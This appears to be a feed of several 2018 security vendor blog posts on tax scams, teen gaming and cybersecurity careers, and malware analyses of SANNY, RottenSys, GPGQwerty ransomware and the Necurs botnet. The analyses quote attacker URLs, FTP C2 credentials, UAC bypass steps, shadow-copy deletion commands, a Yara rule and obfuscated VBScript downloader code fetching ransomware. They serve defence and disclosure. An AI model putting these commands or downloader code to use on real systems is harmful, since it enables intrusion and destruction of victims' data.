In addition to the skills shortage, many IT professionals believe cybersecurity defences are under unprecedented levels of attack. With malware, ransomware, sophisticated advanced threats and modes of attack, many professionals see the cyberthreat landscape as more complex than ever. Nearly half of the cybersecurity professionals who participated  in the survey expressed concern that they will find it difficult or impossible to keep up with the increase and/or complexity of threats over the next year.

So, amid these constantly evolving cyberthreats the pressure is on to find a solution to the skills crisis.

Gamers Could Be the Answer

Well apparently the long list of skills gamers acquire while learning their craft are precisely those required by cybersecurity professionals. Whether it’s cracking systems, avoiding counter attacks or deciphering codes, these talents are very easily transferrable to a security professional role.

Many of us parents might struggle to believe that the hours our teens have spent playing games could in fact have set them up for a career in cybersecurity. But the skills learnt during these ‘training’ hours – including understanding how to approach adversaries, perseverance and logic – are exactly what sets gamers apart ‘from the pack’. The statistics from the report confirm that.

  • Almost all respondents to the survey (92%) believe that gamers possess skills that make them well-suited to a career in cybersecurity. Further, they provide a fresh outlook compared to traditional cybersecurity hires.
  • 72% of respondents agreed that hiring experienced video gamers into their IT departments is a good way of plugging the cybersecurity skills gap.
  • 75% of respondents said they would consider hiring gamers even if they had no prior cybersecurity experience or training.

It’s clearly time to change our perspective, parents!

Everything in Moderation, Kids!

Whether you decide to share this information with your offspring or not, this research is clearly compelling. However, don’t think for a minute that I am suggesting a 24/7 game fest. No, no, no! Time limits, input into/supervision of game purchases and respectful online gaming behaviour still apply!

And please keep an eye out for any signs of addiction. We all know how children’s mood and behaviour can change after lengthy periods in front of a screen. But if you think your child’s interest has gone beyond enthusiasm and that there may be an issue, work through this checklist for gaming addiction. If required, please seek professional help.

Where to From Here?

In my house, nothing will change. There will still be no gaming Monday to Friday, and pre-agreed time limits will still apply. And I’m just wondering how long I can keep this information away from my four boys? Because as soon as they find out, I will be accused of ruining their prospective cybersecurity careers with my strict regime! How dare I!

Take care,

Alex x

 

The post Teen Gaming, Cybersecurity Specialist Training appeared first on McAfee Blogs.

Don’t Get Duped: How to Spot 2018’s Top Tax Scams

It’s the most vulnerable time of the year. Tax time is when cyber criminals pull out their best scams and manage to swindle consumers — smart consumers — out of millions of dollars.

According to the Internal Revenue Service (IRS), crooks are getting creative and putting new twists on old scams using email, phishing and malware, threatening phone calls, and various forms of identity theft to gain access to your hard earned tax refund.

While some of these scams are harder to spot than others, almost all of them can be avoided by understanding the covert routes crooks take to access your family’s data and financial accounts.

According to the IRS, the con games around tax time regularly change. Here are just a few of the recent scams to be aware of:

Erroneous refunds

According to the IRS, schemes are getting more sophisticated. By stealing client data from legitimate tax professionals or buying social security numbers on the black market, a criminal can file a fraudulent tax return. Once the IRS deposits the tax refund into the taxpayer’s account, crooks then use various tactics (phone or email requests) to reclaim the refund from the taxpayer. Multiple versions of this sophisticated scam continue to evolve. If you see suspicious funds in your account or receive a refund check you know is not yours, alert your tax preparer, your bank, and the IRS. To return erroneous refunds, take these steps outlined by the IRS.

Phone scams

If someone calls you claiming to be from the IRS demanding a past due payment in the form of a wire transfer or money order, hang up. Imposters have been known to get aggressive and will even threaten to deport, arrest, or revoke your license if you do not pay the alleged outstanding tax bill.

In a similar scam, thieves call potential victims posing as IRS representatives and tell potential victims that two certified letters were previously sent and returned as undeliverable. The callers then threaten to arrest if a payment the victim does not immediately pay through a prepaid debit card. The scammer also tells the victim that the purchase of the card is linked to the Electronic Federal Tax Payment System (EFTPS) system.

Note: The IRS will never initiate an official tax dispute via phone. If you receive such a call, hang up and report the call to the IRS at 1-800-829-1040.

Robo calls

Baiting you with fear, scammers may also leave urgent “callback” requests through prerecorded phone robot or robo calls, or through a phishing email. Bogus IRS robo often politely ask taxpayers to verify their identity over the phone. These robo calls will even alter caller ID numbers to make it look as if the IRS or another official agency is calling.

Phishing schemes

Be on the lookout for emails with links to websites that ask for your personal information. According to the IRS, thieves now send very authentic-looking messages from credible-looking addresses. These emails coax victims into sharing sensitive information or contain links that contain malware that collects data.

To protect yourself stay alert and be wary of any emails from financial groups or government agencies Don’t share any information online, via email, phone or by text. Don’t click on random links sent to you via email. Once that information is shared anywhere, a crook can steal your identity and use it in different scams.

Human resource/data breaches

In one particular scam crooks target human resource departments. In this scenario, a thief sends an email from a fake organization executive. The email is sent to an employee in the payroll or human resources departments, requesting a list of all employees and their Forms W-2.  This scam is sometimes referred to as business email compromise (BEC) or business email spoofing (BES). 

Using the collected data criminals then attempt to file fraudulent tax returns to claim refunds. Or, they may sell the data on the Internet’s black market sites to others who file fraudulent tax returns or use the names and Social Security Numbers to commit other identity theft related crimes. While you can’t personally avoid this scam, be sure to inquire about your firm’s security practices and try to file your tax return early every year to beat any potentially false filing. Businesses/payroll service providers should file a complaint with the FBI’s Internet Crime Complaint Center (IC3).

As a reminder, the IRS will never:

  • Call to demand immediate payment over the phone, nor will the agency call about taxes owed without first having mailed you several bills.
  • Call or email you to verify your identity by asking for personal and financial information.
  • Demand that you pay taxes without giving you the opportunity to question or appeal the amount they say you owe.
  • Require you to use a specific payment method for your taxes, such as a prepaid debit card.
  • Ask for credit or debit card numbers over the phone or e-mail.
  • Threaten to immediately bring in local police or other law-enforcement groups to have you arrested for not paying.

If you are the victim identity, theft be sure to take the proper reporting steps. If you receive any unsolicited emails claiming to be from the IRS to phishing@irs.gov (and then delete the emails).

This post is part II of our series on keeping your family safe during tax time. To read more about helping your teen file his or her first tax return, here’s Part I.

toni page birdsong

 

 

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures). 

The post Don’t Get Duped: How to Spot 2018’s Top Tax Scams appeared first on McAfee Blogs.

SANNY Malware Delivery Method Updated in Recently Observed Attacks

Introduction

In the third week of March 2018, through FireEye’s Dynamic Threat Intelligence, FireEye discovered malicious macro-based Microsoft Word documents distributing SANNY malware to multiple governments worldwide. Each malicious document lure was crafted in regard to relevant regional geopolitical issues. FireEye has tracked the SANNY malware family since 2012 and believes that it is unique to a group focused on Korean Peninsula issues. This group has consistently targeted diplomatic entities worldwide, primarily using lure documents written in English and Russian.

As part of these recently observed attacks, the threat actor has made significant changes to their usual malware delivery method. The attack is now carried out in multiple stages, with each stage being downloaded from the attacker’s server. Command line evasion techniques, the capability to infect systems running Windows 10, and use of recent User Account Control (UAC) bypass techniques have also been added.

Document Details

The following two documents, detailed below, have been observed in the latest round of attacks:

MD5 hash: c538b2b2628bba25d68ad601e00ad150
SHA256 hash: b0f30741a2449f4d8d5ffe4b029a6d3959775818bf2e85bab7fea29bd5acafa4
Original Filename: РГНФ 2018-2019.doc

The document shown in Figure 1 discusses Eurasian geopolitics as they relate to China, as well as Russia’s security.


Figure 1: Sample document written in Russian

MD5 hash: 7b0f14d8cd370625aeb8a6af66af28ac
SHA256 hash: e29fad201feba8bd9385893d3c3db42bba094483a51d17e0217ceb7d3a7c08f1
Original Filename: Copy of communication from Security Council Committee (1718).doc

The document shown in Figure 2 discusses sanctions on humanitarian operations in the Democratic People’s Republic of Korea (DPRK).


Figure 2: Sample document written in English

Macro Analysis

In both documents, an embedded macro stores the malicious command line to be executed in the TextBox property (TextBox1.Text) of the document. This TextBox property is first accessed by the macro to execute the command on the system and is then overwritten to delete evidence of the command line.

Stage 1: BAT File Download

In Stage 1, the macro leverages the legitimate Microsoft Windows certutil.exe utility to download an encoded Windows Batch (BAT) file from the following URL: http://more.1apps[.]com/1.txt. The macro then decodes the encoded file and drops it in the %temp% directory with the name: 1.bat.

There were a few interesting observations in the command line:

  1. The macro copies the Microsoft Windows certutil.exe utility to the %temp% directory with the name: ct.exe. One of the reasons for this is to evade detection by security products. Recently, FireEye has observed other threat actors using certutil.exe for malicious purposes. By renaming “certutil.exe” before execution, the malware authors are attempting to evade simple file-name based heuristic detections.
  2. The malicious BAT file is stored as the contents of a fake PEM encoded SSL certificate (with the BEGIN and END markers) on the Stage 1 URL, as shown in Figure 3.  The “certutil.exe” utility is then leveraged to both strip the BEGIN/END markers and decode the Base64 contents of the file. FireEye has not previously observed the malware authors use this technique in past campaigns.


Figure 3: Malicious BAT file stored as an encoded file to appear as an SSL certificate

BAT File Analysis

Once decoded and executed, the BAT file from Stage 1 will download an encoded CAB file from the base URL: hxxp://more.1apps[.]com/. The exact file name downloaded is based on the architecture of the operating system.

  • For a 32-bit operating system: hxxp://more.1apps[.]com/2.txt
  • For a 64-bit operating system: hxxp://more.1apps[.]com/3.txt

Similarly, based on Windows operating system version and architecture, the CAB file is installed using different techniques. For Windows 10, the BAT file uses rundll32 to invoke the appropriate function from update.dll (component inside setup.cab).

  • For a 32-bit operating system: rundll32 update.dll _EntryPoint@16
  • For a 64-bit operating system: rundll32 update.dll EntryPoint

For other versions of Windows, the CAB file is extracted using the legitimate Windows Update Standalone Installer (wusa.exe) directly into the system directory:

The BAT file also checks for the presence of Kaspersky Lab Antivirus software on the machine. If found, CAB installation is changed accordingly in an attempt to bypass detection:

Stage 2: CAB File Analysis

As described in the previous section, the BAT file will download the CAB file based on the architecture of the underlying operating system. The rest of the malicious activities are performed by the downloaded CAB file.

The CAB file contains the following components:

  • install.bat – BAT file used to deploy and execute the components.
  • ipnet.dll – Main component that we refer to as SANNY malware.
  • ipnet.ini – Config file used by SANNY malware.
  • NTWDBLIB.dll – Performs UAC bypass on Windows 7 (32-bit and 64-bit).
  • update.dll – Performs UAC bypass on Windows 10.

install.bat will perform the following essential activities:

  1. Checks the current execution directory of the BAT file. If it is not the Windows system directory, then it will first copy the necessary components (ipnet.dll and ipnet.ini) to the Windows system directory before continuing execution:



  2. Hijacks a legitimate Windows system service, COMSysApp (COM+ System Application) by first stopping this service, and then modifying the appropriate Windows service registry keys to ensure that the malicious ipnet.dll will be loaded when the COMSysApp service is started:



  3. After the hijacked COMSysApp service is started, it will delete all remaining components of the CAB file:

ipnet.dll is the main component inside the CAB file that is used for performing malicious activities. This DLL exports the following two functions:

  1. ServiceMain – Invoked when the hijacked system service, COMSysApp, is started.
  2. Post – Used to perform data exfiltration to the command and control (C2) server using FTP protocol.

The ServiceMain function first performs a check to see if it is being run in the context of svchost.exe or rundll32.exe. If it is being run in the context of svchost.exe, then it will first start the system service before proceeding with the malicious activities. If it is being run in the context of rundll32.exe, then it performs the following activities:

  1. Deletes the module NTWDBLIB.DLL from the disk using the following command:

    cmd /c taskkill /im cliconfg.exe /f /t && del /f /q NTWDBLIB.DLL

  2. Sets the code page on the system to 65001, which corresponds to UTF-8:

    cmd /c REG ADD HKCU\Console /v CodePage /t REG_DWORD /d 65001 /f

Command and Control (C2) Communication

SANNY malware uses the FTP protocol as the C2 communication channel.

FTP Config File

The FTP configuration information used by SANNY malware is encoded and stored inside ipnet.ini.

This file is Base64 encoded using the following custom character set: SbVIn=BU/dqNP2kWw0oCrm9xaJ3tZX6OpFc7Asi4lvuhf-TjMLRQ5GKeEHYgD1yz8

Upon decoding the file, the following credentials can be recovered:

  • FTP Server: ftp.capnix[.]com
  • Username: cnix_21072852
  • Password: vlasimir2017

It then continues to perform the connection to the FTP server decoded from the aforementioned config file, and sets the current directory on the FTP server as “htdocs” using the FtpSetCurrentDirectoryW function.

System Information Collection

For reconnaissance purposes, SANNY malware executes commands on the system to collect information, which is sent to the C2 server.

System information is gathered from the machine using the following command:

The list of running tasks on the system is gathered by executing the following command:

C2 Commands

After successful connection to the FTP server decoded from the configuration file, the malware searches for a file containing the substring “to everyone” in the “htdocs” directory. This file will contain C2 commands to be executed by the malware.

Upon discovery of the file with the “to everyone” substring, the malware will download the file and then performs actions based on the following command names:

  • chip command: This command deletes the existing ipnet.ini configuration file from the file system and creates a new ipnet.ini file with a specified configuration string. The chip commands allows the attacker to migrate malware to a new FTP C2 server. The command has the following syntax: 



  • pull command: This command is used for the purpose of data exfiltration. It has the ability to upload an arbitrary file from the local filesystem to the attacker’s FTP server. The command has the following syntax:

The uploaded file is compressed and encrypted using the routine described later in the Compression and Encoding Data section.

  • put command: This command is used to copy an existing file on the system to a new location and delete the file from the original location. The command has the following syntax:

  • default command: If the command begins with the substring “cmd /c”, but it is not followed by either of the previous commands (chip, pull, and put), then it directly executes the command on the machine using WinExec.
  • /user command: This command will execute a command on the system as the logged in user. The command duplicates the access token of “explorer.exe” and spawns a process using the following steps:

    1. Enumerates the running processes on the system to search for the explorer.exe process and obtain the process ID of explorer.exe.
    2. Obtains the access token for the explorer.exe process with the access flags set to 0x000F01FF.
    3. Starts the application (defined in the C2 command) on the system by calling the CreateProcessAsUser function and using the access token obtained in Step 2.

C2 Command

Purpose

chip

Update the FTP server config file

pull

Upload a file from the machine

put

Copy an existing file to a new destination

/user

Create a new process with explorer.exe access token

default command

Execute a program on the machine using WinExec()

Compression and Encoding Data

SANNY malware uses an interesting mechanism for compressing the contents of data collected from the system and encoding it before exfiltration. Instead of using an archiving utility, the malware leverages Shell.Application COM object and calls the CopyHere method of the IShellDispatch interface to perform compression as follows:

  1. Creates an empty ZIP file with the name: temp.zip in the %temp% directory.
  2. Writes the first 16 bytes of the PK header to the ZIP file.
  3. Calls the CopyHere method of IShellDispatch interface to compress the collected data and write to temp.zip.
  4. Reads the contents of temp.zip to memory.
  5. Deletes temp.zip from the disk.
  6. Creates an empty file, post.txt, in the %temp% directory.
  7. The temp.zip file contents are Base64 encoded (using the same custom character set mentioned in the previous FTP Config File section) and written to the file: %temp%\post.txt.
  8. Calls the FtpPutFileW function to write the contents of post.txt to the remote file with the format: “from <computer_name_timestamp>.txt”

Execution on Windows 7 and User Account Control (UAC) Bypass

NTWDBLIB.dll – This component from the CAB file will be extracted to the %windir%\system32 directory. After this, the cliconfg command is executed by the BAT file.

The purpose of this DLL module is to launch the install.bat file. The file cliconfg.exe is a legitimate Windows binary (SQL Client Configuration Utility), loads the library NTWDBLIB.dll upon execution. Placing a malicious copy of NTWDBLIB.dll in the same directory as cliconfg.exe is a technique known as DLL side-loading, and results in a UAC bypass.

Execution on Windows 10 and UAC Bypass

Update.dll – This component from the CAB file is used to perform UAC bypass on Windows 10. As described in the BAT File Analysis section, if the underlying operating system is Windows 10, then it uses update.dll to begin the execution of code instead of invoking the install.bat file directly.

The main actions performed by update.dll are as follows:

  1. Executes the following commands to setup the Windows registry for UAC bypass:



  2. Leverages a UAC bypass technique that uses the legitimate Windows binary, fodhelper.exe, to perform the UAC bypass on Windows 10 so that the install.bat file is executed with elevated privileges:



  3. Creates an additional BAT file, kill.bat, in the current directory to delete evidence of the UAC bypass. The BAT file kills the current process and deletes the components update.dll and kill.bat from the file system:

Conclusion

This activity shows us that the threat actors using SANNY malware are evolving their malware delivery methods, notably by incorporating UAC bypasses and endpoint evasion techniques. By using a multi-stage attack with a modular architecture, the malware authors increase the difficulty of reverse engineering and potentially evade security solutions.

Users can protect themselves from such attacks by disabling Office macros in their settings and practicing vigilance when enabling macros (especially when prompted) in documents, even if such documents are from seemingly trusted sources.

Indicators of Compromise

SHA256 Hash

Original Filename

b0f30741a2449f4d8d5ffe4b029a6d3959775818bf2e85bab7fea29bd5acafa4

РГНФ 2018-2019.doc

e29fad201feba8bd9385893d3c3db42bba094483a51d17e0217ceb7d3a7c08f1

 

Copy of communication from Security Council Committee (1718).doc

eb394523df31fc83aefa402f8015c4a46f534c0a1f224151c47e80513ceea46f

1.bat

a2e897c03f313a097dc0f3c5245071fbaeee316cfb3f07785932605046697170

Setup.cab (64-bit)

a3b2c4746f471b4eabc3d91e2d0547c6f3e7a10a92ce119d92fa70a6d7d3a113

Setup.cab (32-bit)

RottenSys Malware Reminds Users to Think Twice Before Buying a Bargain Phone

China is a region that has been targeted with mobile malware for over a decade, as malware authors there are continually looking at different tactics to lure victims. One of the most innovative tactics that we have come across in the past several years is to get victims to buy discounted devices from sellers that have compromised a smartphone. And now, one of these campaigns, Android.MobilePay (aka dubbed RottenSys) is making headlines, though McAfee has been aware of it for over two years. The tactic used by the author(s)/distributors is straightforward; they install fake apps on a device that pretend to provide a critical function, but often don’t get used.

RottenSys is stealthy. It doesn’t provide any secure Wi-Fi related service but is rather an advanced strain of malware that swoops almost all sensitive Android permissions to enable its malicious activities. In order to avoid detection, RottenSys doesn’t come with an initial malicious component and or immediately initiate malicious activity. The strain has rather been designed to communicate with its command-and-control servers to obtain the actual malicious code in order to execute it and following which installs the malicious code onto the device.

Given it installs any new malicious components from its C&C server, RottenSys can be used to weaponize or take full control over millions of infected devices. In fact, it already seems that the hackers behind RottenSys have already started turning infected devices into a massive botnet network.

This attack acts as an indication of change, as over the past two years the mechanism of fraud has adapted. In the past, scams such as this typically have used premium SMS scams to generate revenue, which reach out to a premium number and make small charges that go unnoticed over the course of an extensive period. As described in detail in our Mobile Threat Report: March 2018, we have seen traditional attack vectors, such as premium text messages and toll fraud replaced by botnet ad fraud, pay-per-download distribution scams, and crypto mining malware that can generate millions in revenue.

Long story short – it’s important to still take precautionary steps to avoid future infection from this type of malware scheme. The good news is, you can easily check if your device is being infected with RottenSys. Go to Android system settings→ App Manager, and then look for the following possible malware package names:

  • android.yellowcalendarz
  • changmi.launcher
  • android.services.securewifi
  • system.service.zdsgt

Beyond that, you can protect your device by following these tips:

  • Buy with security in mind. When looking to purchase your next mobile device, make sure to do a factory reset as soon as you turn it on for the first time.
  • Delete any unnecessary apps. Most mobile providers allow users to delete pre-installed apps. So, if there’s a pre-installed app you don’t use, or seems unknown to you, go ahead and remove it from your device entirely.
  • Always scan your device, even if it’s new. One of the first applications you should load onto a new device is an anti-malware scanner, like McAfee Mobile Security. It can detect and alert users to malicious behavior on their devices. In this case, if a malware variant is detected, new users can see if they can return their infected devices in exchange for a clean one.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post RottenSys Malware Reminds Users to Think Twice Before Buying a Bargain Phone appeared first on McAfee Blogs.

Ransomware Takes Open-Source Path, Encrypts With GNU Privacy Guard

McAfee Labs has recently observed a new variant of ransomware that relies on the open-source program GNU Privacy Guard (GnuPG) to encrypt data. GnuPG is a hybrid-encryption software program that uses a combination of conventional symmetric-key cryptography for speed and public-key cryptography to ease the secure key exchange. Although ransomware using GnuPG to encrypt files is not unique, it is uncommon.

We analyzed the following SHA-256 hashes of the malware GPGQwerty:

  • 2762a7eadb782d8a404ad033144954384be3ed11e9714c468c99f0d3df644ef5
  • 39c510bc504a647ef8fa1da8ad3a34755a762f1be48e200b9ae558a41841e502
  • f5cd435ea9a1c9b7ec374ccbd08cc6c4ea866bcdc438ea8f1523251966c6e88b

We found these hashes need many support files for successful execution. The three files themselves will not encrypt anything. GPGQwerty consists of a bundle of files that runs together to encrypt a victim’s machine. The bundle comprises ten files:

This ransomware was first seen at the beginning of March. Generally, this type of malware spreads by spam email, malicious attachments, exploits, or fraudulent downloads. The binary 39c510bc504a647ef8fa1da8ad3a34755a762f1be48e200b9ae558a41841e502 was spotted in the wild at hxxp://62.152.47.251:8000/w/find.exe; it may be part of a drive-by download strategy or was hosted on a legitimate site.

Key.bat, run.js, and find.exe are three files that play a vital role in the encryption process. The infection process follows this path:

Analysis

The binary find.exe has eight sections and the raw size of its .bss section is zero.

It also has an unusual time and date stamp:

The file includes malicious thread local storage (TLS) callbacks as an anti-analysis trick. Generally, this technique allows executable files to include malicious TLS callback functions to run prior to the AddressOfEntryPoint field (the normal execution point of a binary) in the executable header.

The action starts with the execution of the batch file key.bat. It imports the key and launches find.exe on the victim’s machine by executing the JavaScript run.js. The contents of the batch and JavaScript files are shown in the following snippet:

This ransomware kills some selected running tasks using command-line utility taskkill. This command has options to kill a task or process either by using the process ID or the image filename. In the following snippet, we see it terminating some processes forcefully by using their image names.

The ransomware tries to encrypt data using GnuPG (gpg.exe). The malware appends the extension .qwerty to the encrypted files:

The malware overwrites the original files using shred.exe:

After encryption, the ransomware allots a unique ID that identifies each victim. It also creates a .txt file that states all files on the computer have been locked and the victim must pay to decrypt the files.

GPGQwerty deletes the recycle bin using the Windows utility del:

Using the command “vssadmin.exe Delete Shadows /All /Quiet,” the ransomware silently removes the volume shadow copies (vssadmin.exe, wmic.exe) from the target’s system, thus preventing the victim from restoring the encrypted files. It also deletes backup catalogs (wbadmin.exe) and disables automatic repair at boot time (bcdedit.exe):

Finally, it creates the ransom note readme_decrypt.txt in each folder that holds an encrypted file. The ransom note gives instructions to communicate with an email address within 72 hours to arrange payment.

This Yara rule detects GPGQwerty:

rule crime_ransomware_windows_GPGQwerty: crime_ransomware_windows_GPGQwerty

{

meta:

author = “McAfee Labs”

description = “Detect GPGQwerty ransomware”

strings:

$a = “gpg.exe –recipient qwerty  -o”

$b = “%s%s.%d.qwerty”

$c = “del /Q /F /S %s$recycle.bin”

$d = “cryz1@protonmail.com”

condition:

          all of them

}

 

McAfee advises all users to keep their antimalware products up to date. McAfee products detect this malware as Ransomware-GKF! [Partial hash] with DAT Versions 8826 and later. For more on combating ransomware, visit NoMoreRansom.org.

The post Ransomware Takes Open-Source Path, Encrypts With GNU Privacy Guard appeared first on McAfee Blogs.

7 Digital Safety Tips for Teens Filing Their First Tax Returns

Landing that first part-time job in high school and filing your first tax return is a rite of passage for a young person. So why am I so anxious about my daughter becoming a taxpayer and sharing her pristine personal data with the U.S. government?

Where do I begin? The fact is, the more widely her personal information travels, the more digital risks she faces. Adding to my angst is my own experience with identity theft over a decade ago that still haunts me and is the last stress I’d wish upon my child or anyone else’s.

So as my daughter waves her W-2 at me and elatedly chatters about how she’s going to spend her refund, I — like so many other parents across the country — put on my coach’s hat for a key talk around the digital risks that come with tax season.

7 Tax Filing Safety Tips for Families

  1. Allow your child to file. Sometimes it’s easier just to file a 1040-EZ form for your child and be done with it. The wiser route is to take the time to teach your child the few steps needed to file correctly and the legal reasons we all must pay taxes. Part of this discussion is going over the digital risks of tax season such as identity theft, malware and viruses, tax fraud, and identity theft.
  2. Discuss the power of a SSN. Talk about the responsibility and power of owning a Social Security Number (SSN) and why it must be safeguarded. A SSN is the most critical piece of government-issued identification an American citizen can possess. It is tied to personal credit, identification, and is the primary way the way the government tracks earnings of an individual during his or her lifetime. The SSN is the golden ticket for cyber thieves who make a career of stealing and selling social security numbers and identities online.
  3. Secure all digital doorways. One of the ways cyber thieves gain access to personal information is through hacking, and the best way to slam that door is by creating strong passwords. Easy passwords are the #1 way hackers unlock our data. Tax time is a perfect opportunity to challenge your child to create stronger passwords for all of his or her devices and email accounts. At the same time you upgrade password security, make sure updates on software, PCs, phones, and web browsers are current to protect your devices against viruses and malware that can grab login information.
  4. File early. Start the habit of early filing. The sooner you file your tax return and teach your child to do the same, the more you lessen the chance of a thief using yours or your child’s identity to claim a refund before your return goes through. According to the Identity Theft Resource Center, tax return fraud is on the rise due to more significant security breaches and the number of identities now for sale online.
  5. Be overly cautious every step of the way. Use a reputable firm or company to handle yours and your child’s tax return. Legitimate tax preparers must sign all forms with their IRS preparer identification number. If you end up filing the 1040-EZ form on paper, be sure to hand deliver your returns to the post office mailbox. Thieves target March and April as prime for stealing tax information from curbside, residential mailboxes. Filing online? That’s fine if you make sure you do so over secured wifi. The local coffee shop or library isn’t going to protect your tax information from unscrupulous, prying eyes. Look for the HTTPS web designation at the front of the Internal Revenue System’s web address before submitting your documents.
  6. File a fraud alert. Because your child has rarely used his or her social security number, set up a fraud alert. By submitting a fraud alert in your child’s name with the three main credit bureaus several times a year, you will be able to catch any credit fraud early. Since your child hasn’t built any credit, anything that comes back will be illegal activity. The fraud alert will remain in place for only 90 days. When the time runs out, you’ll need to reactivate the alert. You can achieve the same thing by filing an earnings report from the Social Security Administration. The report will reveal any earnings acquired under your child’s social security number.
  7. Celebrate. Tax time tends to bring out the anxiety in just about everyone. Change that mentality with your child if possible. Make tax time rewarding. Go out for a celebration dinner or dessert. Congratulate him or her on filing safely and responsibly. And, don’t forget to recognize the even bigger accomplishment of stepping into the workforce and taking on the challenge of a first job.

This post is the first of a two-part series focused on digital safety during tax season. Next week, we will highlight some of the scams thieves use and how to safeguard your family.

toni page birdsong

 

 

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures). 

The post 7 Digital Safety Tips for Teens Filing Their First Tax Returns appeared first on McAfee Blogs.

Necurs Botnet Leads the World in Sending Spam Traffic

In Q4 2017 we found that the Necurs and Gamut botnets comprised 97% of spam botnet traffic. (See the McAfee Labs Threats Report, March 2018.) Necurs (at 60%) is currently the world’s largest spam botnet. The infected computers operate in a peer-to-peer model, with limited communication between the nodes and the control servers. Cybercriminals can rent access to the botnet to spread their own malicious campaigns.

The most common techniques are email attachments with macros or JavaScript to download malware from different locations. In October, the Locky ransomware campaign used Microsoft’s Dynamic Data Exchange to lure victims into “updating” the attached document with data from linked files—external links that delivered the malware.

In Q4 we noticed several botnet campaigns delivering the following payloads:

  • GlobeImposter ransomware
  • Locky ransomware
  • Scarab ransomware
  • Dridex banking Trojan

A timeline:

Let’s zoom in on one of the campaigns from the Necurs botnet. In the following example, an email automatically sent from a VOIP system informs the victim of a missed call. The email contains an attachment, a Visual Basic script.

In this case, the name is “Outside Caller 19-12-2017 [random nr].” Here is some of the script code:

Execute "Sub Aodunnecessarilybusinesslike(strr):ZabiT.Savetofile writenopopbusinesslikeInPlaceOf , 2 : End Sub"

Disaster = "//21+12:ptth21+12ex"+"e.eUtaLHpbP\21+12elifotevas21+12ydoBes"+"nopser21+12etirw21+12nepo21+12epyT21+12PmeT21+12TeG21+12ssecorP21+12llehs.tpircsW21+12noitacilppA.llehs21+12" & "" 

 

This piece of code makes sure that the embedded code will be saved to a file. Note the second line of code: It is backward and calls the Windows script shell to execute the code. The following code string ensures that the backward line is read properly:

SudForMake = Split("Microsoft.XMLHTTP21+12Adodb.streaM"+StrReverse(Disaster),  "21+12")

 

The following line starts the saved code:

writenopopbusinesslikeMacAttack.Run("cmd."&"exe /c START """" "+" " & ArrArr ) 

 

Once the executable is started, it attempts to download the ransomware from the embedded URLs in the code: 

krapivec = Array("littleblessingscotons.com/jdh673hk?","smarterbaby.com/jdh673hk?","ragazzemessenger.com/jdh673hk?") 

 

The malware downloaded and executed is GlobeImposter ransomware. After encrypting all files and deleting the Volume Shadow copies to block file restore, the user is prompted with the request to buy the decryptor:

Spam botnets are one of the pillars of the cybercrime business. The authors of these botnets understand their market value and spend their rental income on continuous development. Their work keeps the infrastructure running, creates ever-changing spam messages, and delivers these messages to your inbox—with many avoiding spam blockers. This cybercrime effort should inspire your organization to discuss the implementation of DMARC (domain-based message authentication, reporting & conformance). To learn more about how DMARC can help protect against this kind of threat, visit dmarc.org. For more on Necurs, see the McAfee Labs Threats Report, June 2017.

The post Necurs Botnet Leads the World in Sending Spam Traffic appeared first on McAfee Blogs.

‘McAfee Labs Threats Report’ Examines Cryptocurrency Hijacking, Ransomware, Fileless Malware

Today McAfee published the McAfee Labs Threats Report: March 2018. The report looks into the growth and trends of new malware, ransomware, and other threats in Q4 2017. McAfee Labs saw on average eight new threat samples per second, and the increasing use of fileless malware attacks leveraging Microsoft PowerShell. The Q4 spike in Bitcoin value prompted cybercriminals to focus on cryptocurrency hijacking through a variety of methods, including malicious Android apps.

Each quarter, McAfee Labs, led by the Advanced Threat Research team, assesses the state of the cyber threat landscape based on threat data gathered by the McAfee Global Threat Intelligence cloud from hundreds of millions of sensors across multiple threat vectors around the world. McAfee Advanced Threat Research complements McAfee Labs by providing in-depth investigative analysis of cyberattacks from around the globe.

Cybercriminals Take on New Strategies, Tactics

The fourth quarter of 2017 saw the rise of newly diversified cybercriminals, as a significant number of actors embraced novel criminal activities to capture new revenue streams. For instance, the spike in the value of Bitcoin prompted actors to branch out from moneymakers such as ransomware, to the practice of hijacking Bitcoin and Monero wallets. McAfee researchers discovered Android apps developed exclusively for the purpose of cryptocurrency mining and observed discussions in underground forums suggesting Litecoin as a safer model than Bitcoin, with less chance of exposure.

Cybercriminals also continued to adopt fileless malware leveraging Microsoft PowerShell, which surged 432% over the course of 2017, as the threat category became a go-to toolbox. The scripting language was used within Microsoft Office files to execute the first stage of attacks.

Health Care Targeted

Although publicly disclosed security incidents targeting health care decreased by 78% in the fourth quarter of 2017, the sector experienced a dramatic 210% overall increase in incidents in 2017. Through their investigations, McAfee Advanced Threat Research analysts conclude many incidents were caused by organizational failure to comply with security best practices or address known vulnerabilities in medical software.

McAfee Advanced Threat Research analysts looked into possible attack vectors related to health care data, finding exposed sensitive images and vulnerable software. Combining these attack vectors, analysts were able to reconstruct patient body parts, and create three-dimensional models.

Q4 2017 Threats Activity

Fileless malware. In Q4 JavaScript malware growth continued to slow with new samples decreasing by 9%, while new PowerShell malware more than tripled, growing 267%.

Security incidents. McAfee Labs counted 222 publicly disclosed security incidents in Q4, a decrease of 15% from Q3. 30% of all publicly disclosed security incidents in Q4 took place in the Americas, followed by 14% in Europe and 11% in Asia.

Vertical industry targets. Public, health care, education, and finance, respectively, led vertical sector security incidents for 2017.

  • Health Care. Disclosed incidents experienced a surge in 2017, rising 210%, while falling 78% in Q4.
  • Public sector. Disclosed incidents decreased 15% in 2017, down 37% in Q4.
  • Disclosed incidents rose 125% in 2017, remaining stagnant in Q4.
  • Disclosed incidents rose 16% in 2017, falling 29% in Q4. 

Regional targets

  • Disclosed incidents rose 46% in 2017, falling 46% in Q4.
  • Disclosed incidents fell 58% in 2017, rising 28% in Q4.
  • Disclosed incidents fell 20% in 2017, rising 18% in Q4.
  • Disclosed incidents rose 42% in 2017, falling 33% in Q4. 

Attack vectors. In Q4 and 2017 overall, malware led disclosed attack vectors, followed by account hijacking, leaks, distributed denial of service, and code injection.

Ransomware. The fourth quarter saw notable industry and law enforcement successes against criminals responsible for ransomware campaigns. New ransomware samples grew 59% over the last four quarters, while new ransomware samples growth rose 35% in Q4. The total number of ransomware samples increased 16% in the last quarter to 14.8 million samples.

Mobile malware. New mobile malware decreased by 35% from Q3. In 2017 total mobile malware experienced a 55% increase, while new samples declined by 3%.

